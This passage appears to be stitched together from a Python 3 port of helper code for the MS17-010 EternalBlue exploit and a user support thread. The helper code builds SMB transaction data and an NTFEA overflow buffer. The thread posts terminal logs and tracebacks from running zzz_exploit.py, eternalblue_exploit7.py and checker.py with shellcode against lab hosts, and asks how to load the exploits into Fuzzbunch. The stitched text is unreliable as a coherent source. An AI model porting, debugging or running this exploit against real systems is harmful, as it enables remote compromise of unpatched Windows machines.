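    no_pad is set (the 4-byte rule is an assumed, illustrative layout).
    Returns (blob, parameter_offset, data_offset)."""
    parameters = as_bytes(parameters)
    data = as_bytes(data)

    pad_len = 0 if no_pad else pad_to(header_len)
    # b"\x00" (bytes) + bytes works; "\x00" (str) + bytes is the TypeError
    blob = b"\x00" * pad_len + parameters
    parameter_offset = header_len + pad_len

    pad_len = 0 if no_pad else pad_to(header_len + len(blob))
    data_offset = header_len + len(blob) + pad_len
    blob += b"\x00" * pad_len + data
    return blob, parameter_offset, data_offset


def ntfea_chunk(size=0xFFDE):
    # Python 3 form of the module-level NTFEA buffer that raises
    # "can't concat str to bytes": the filler must be b"A", not "A"
    return pack("<BBH", 0, 0, size - 1) + b"A" * size


if __name__ == "__main__":
    blob, poff, doff = put_trans_data(35, "\x01\x02", b"ABC")
    print(blob, poff, doff)
```

When porting, the same rule applies to every `'\x00' * n`, `'A' * n`, `'\PIPE\\x00'` style literal and to `str(pkt)` calls (which become `pkt.getData()` on a packet object); grepping for quoted string literals that are later joined to pack() output finds most of them.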
Traceback (most recent call last):
File "eternalblue_poc.py", line 1, in <module>
from impacket import smb
ImportError: No module named impacket
root@kali:~/MS17-010# ./zzz_exploit.py 192.168.111.129 shellcode/sc_all.bin
Target OS: Windows 7 Ultimate 7600
Traceback (most recent call last):
File "./zzz_exploit.py", line 954, in <module>
exploit(target, pipe_name)
File "./zzz_exploit.py", line 795, in exploit
if not info['method'](conn, pipe_name, info):
File "./zzz_exploit.py", line 469, in exploit_matched_pairs
fid = conn.nt_create_andx(tid, pipe_name)
File "/root/MS17-010/mysmb.py", line 170, in nt_create_andx
self._last_fid = smb.SMB.nt_create_andx(self, tid, filename, smb_packet, cmd, shareAccessMode, disposition, accessMask)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3741, in nt_create_andx
if smb.isValidAnswer(SMB.SMB_COM_NT_CREATE_ANDX):
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 712, in isValidAnswer
raise SessionError, ("SMB Library Error", self['ErrorClass'] + (self['_reserved'] << 8), self['ErrorCode'], self['Flags2'] & SMB.FLAGS2_NT_STATUS)
impacket.smb.SessionError: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
root@kali:~/MS17-010# ping 192.168.111.129 -c 1
PING 192.168.111.129 (192.168.111.129) 56(84) bytes of data.
64 bytes from 192.168.111.129: icmp_seq=1 ttl=128 time=0.906 ms
--- 192.168.111.129 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.906/0.906/0.906/0.000 ms
root@kali:~/MS17-010# ./eternalblue_exploit7.py 192.168.111.129 shellcode/sc_all.bin
shellcode size: 2284
numGroomConn: 13
Target OS: Windows 7 Ultimate 7600
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
root@kali:~/MS17-010#
How do I install these exploits into Fuzzbunch?
Hello,
When I run checker.py, I get an error from mysmb.py:
root@kali:~/Documents/Eternalblue# python checker.py 10.0.0.9
Target OS:
Traceback (most recent call last):
File "checker.py", line 42, in <module>
conn.login(USERNAME, PASSWORD)
File "/root/Documents/EternalBlue/10.0.0.9/mysmb.py", line 152, in login
smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
TypeError: login() takes at most 6 arguments (7 given)
Is this an error? Or do I have to give checker.py more/less input?
Traceback (most recent call last):
File "eternalblue_exploit7.py", line 563, in <module>
exploit(TARGET, sc, numGroomConn)
File "eternalblue_exploit7.py", line 525, in exploit
recvPkt = conn.recvSMB()
File "build/bdist.macosx-10.13-x86_64/egg/impacket/smb.py", line 2505, in recvSMB
File "build/bdist.macosx-10.13-x86_64/egg/impacket/nmb.py", line 899, in recv_packet
File "build/bdist.macosx-10.13-x86_64/egg/impacket/nmb.py", line 977, in __read
File "build/bdist.macosx-10.13-x86_64/egg/impacket/nmb.py", line 966, in non_polling_read
impacket.nmb.NetBIOSError: Error while reading from remote